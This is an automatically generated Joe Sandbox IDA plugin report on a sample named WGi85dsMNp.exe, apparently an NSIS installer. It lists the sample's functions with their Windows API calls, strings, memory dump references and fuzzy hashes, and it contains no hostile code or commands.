Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsoC476.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A
C:\Users\user\AppData\Local\Temp\nsoC476.tmp, xrefs: 004025E1

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsoC476.tmp$C:\Users\user\AppData\Local\Temp\nsoC476.tmp\System.dll
API String ID: 3109718747-2427345754
Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 6F9418D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6F94193A
GlobalFree.KERNEL32(?), ref: 6F941ADA
GlobalFree.KERNEL32(?), ref: 6F941ADF

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: a66b57fb0fc237b61d2e4119f7234950d60020a7cf2c74dcac3ed0a74b23f0b2
Instruction ID: c5b245ad83e05b22e9c2ceb093cf071141a5848933e905557cc4c9b3331a6292
Opcode Fuzzy Hash: a66b57fb0fc237b61d2e4119f7234950d60020a7cf2c74dcac3ed0a74b23f0b2
Instruction Fuzzy Hash: AD51C232D041599ACBA39FB886405AEB7B9AF77318B00425BD614E72C1D770FEE187B1

Function 6F942394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6F9424D6

Part of subcall function 6F94122C: lstrcpynW.KERNEL32(00000000,?,6F9412DF,00000019,6F9411BE,-000000A0), ref: 6F94123C

GlobalAlloc.KERNEL32(00000040), ref: 6F94245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F942477

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3f5749efbad4a5aba9694c089d58048815ad1023029b6930d7dd34bbaab1a9cf
Instruction ID: f74d77f5f87ca4259384ebe8f8d71f41c9fc2ef531e2ac36828231750faf09b9
Opcode Fuzzy Hash: 3f5749efbad4a5aba9694c089d58048815ad1023029b6930d7dd34bbaab1a9cf
Instruction Fuzzy Hash: AF41BDB0008705DFD724EF68D844A6677B8FBBA724B004A5EE546C75C2EB70E498CF61

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 6F94161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F941635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F94163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9421EC,?,00000808), ref: 6F941650
GetProcAddress.KERNEL32(6F9421EC,00000000), ref: 6F941657
GlobalFree.KERNEL32(00000000), ref: 6F941660

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: ae35bb319aaa23c5b82d16b788c59a6cf840cb843f0f3bd76c175cdedf13a9ad
Instruction ID: 1acaffe15705b26657ab3e27be878011c254a3d177374d5158f2df1613b783bb
Opcode Fuzzy Hash: ae35bb319aaa23c5b82d16b788c59a6cf840cb843f0f3bd76c175cdedf13a9ad
Instruction Fuzzy Hash: B4F0127210A5387BDB202AAA8C4CC9B7F9CEF9B2F5B110211F6189119085624C25DFF1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18

Function 00405CBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(007321E8), ref: 00401BE7
GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BF9

Strings

!s, xrefs: 00401B7A, 00401BAA, 00401BB9, 00401BE2, 00401C0D, 00401C14
Call, xrefs: 00401B9E, 00401BA4, 00401BBE

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Global$AllocFree
String ID: Call$!s
API String ID: 3394109436-3991978899
Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75922EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,00403A1A,75923420,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 00405D09 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405D0F
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WGi85dsMNp.exe,C:\Users\user\Desktop\WGi85dsMNp.exe,80000000,00000003), ref: 00405D1F

Strings

C:\Users\user\Desktop, xrefs: 00405D09

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction ID: 65148869c9b5617484fe42b3676c909fd92059a2a8224d2a454660f99163d925
Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
Instruction Fuzzy Hash: A3D0A7B7410920EAD3126B04DC04D9F73ACEF51300B46843BE840A7171D7785CD18BEC

Function 6F9410E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6F94116A
GlobalFree.KERNEL32(00000000), ref: 6F9411C7
GlobalFree.KERNEL32(00000000), ref: 6F9411D9
GlobalFree.KERNEL32(?), ref: 6F941203

Memory Dump Source

Source File: 00000000.00000002.2212754583.000000006F941000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F940000, based on PE: true

Associated: 00000000.00000002.2212735857.000000006F940000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212770534.000000006F944000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2212826501.000000006F946000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f940000_WGi85dsMNp.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 02f0a6755b8376bf55fc62c7f6ae3dd83f741eac300ad7199fd5ed793762ef75
Instruction ID: 58f0c395c88be36f5dbbf19ebe15aa0c5fa519c253666cc377b24cdc6b5f68c1
Opcode Fuzzy Hash: 02f0a6755b8376bf55fc62c7f6ae3dd83f741eac300ad7199fd5ed793762ef75
Instruction Fuzzy Hash: DE3194B55042019FEB229FBCC945A7577E8FB7B320700061AE848D72D5E735E8B58F60

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.2179133060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2179119989.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179147445.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179162114.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2179220719.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WGi85dsMNp.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
